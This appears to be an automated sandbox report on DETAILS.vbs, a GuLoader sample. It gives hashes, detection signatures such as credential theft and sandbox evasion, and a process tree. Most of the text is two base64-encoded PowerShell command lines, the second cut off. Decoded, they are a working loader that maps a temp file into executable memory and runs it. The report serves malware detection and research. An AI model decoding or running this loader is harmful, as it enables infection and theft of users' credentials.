Play interactive tour

Edit tour

Windows Analysis Report DETAILS.vbs

Overview

General Information

Sample Name:	DETAILS.vbs
Analysis ID:	528495
MD5:	6ece5dd9df7e2a34f492adc0c6184d81
SHA1:	f205057a0d17fab518a137e266335883a581289b
SHA256:	fc344554030bfb7f2ca7c79e99a5006f740c3c9f210dc38757c53537c9692f5e
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected GuLoader

Hides threads from debuggers

Tries to steal Mail credentials (via file / registry access)

Creates an autostart registry key pointing to binary in C:\Windows

Tries to detect Any.run

Wscript starts Powershell (via cmd or directly)

Potential malicious VBS script found (has network functionality)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Encrypted powershell cmdline option found

Very long command line found

Suspicious powershell command line found

Creates autostart registry keys with suspicious values (likely registry only malware)

C2 URLs / IPs found in malware configuration

Sigma detected: Suspicious Csc.exe Source File Folder

Uses dynamic DNS services

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Searches the installation path of Mozilla Firefox

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Compiles C# or VB.Net code

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

wscript.exe (PID: 5176 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\DETAILS.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)

powershell.exe (PID: 6584 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

csc.exe (PID: 1528 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 5176 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

ieinstal.exe (PID: 6228 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)

conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 2692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzA